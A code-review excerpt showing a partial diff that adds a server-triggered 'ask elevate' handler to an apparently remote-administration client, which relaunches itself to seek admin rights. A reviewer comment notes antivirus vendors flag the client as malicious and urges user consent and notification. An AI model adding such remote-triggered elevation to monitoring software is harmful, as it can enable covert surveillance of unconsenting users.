Client/Core/Commands/SystemHandler.cs

```diff
@@ -438,6 +439,35 @@ public static void HandleDoProcessKill(Packets.ServerPackets.DoProcessKill comma
             }
         }
 
+        public static void HandleAskElevate(Packets.ServerPackets.DoAskElevate command, Client client)
+        {
+            if (!(WindowsAccountHelper.GetAccountType() == "Admin"))
+            {
+                ProcessStartInfo proc = new ProcessStartInfo();
+                proc.UseShellExecute = true;
+                proc.WorkingDirectory = Environment.CurrentDirectory;
+                proc.FileName = Application.ExecutablePath;
```

Comment:
I think their is misunderstanding, the client already is classified as malicious by some antivirus companies. I think you should also take permission and notify the user that his desktop (for example) is monitored.
Finally good work, It is up to you :smile: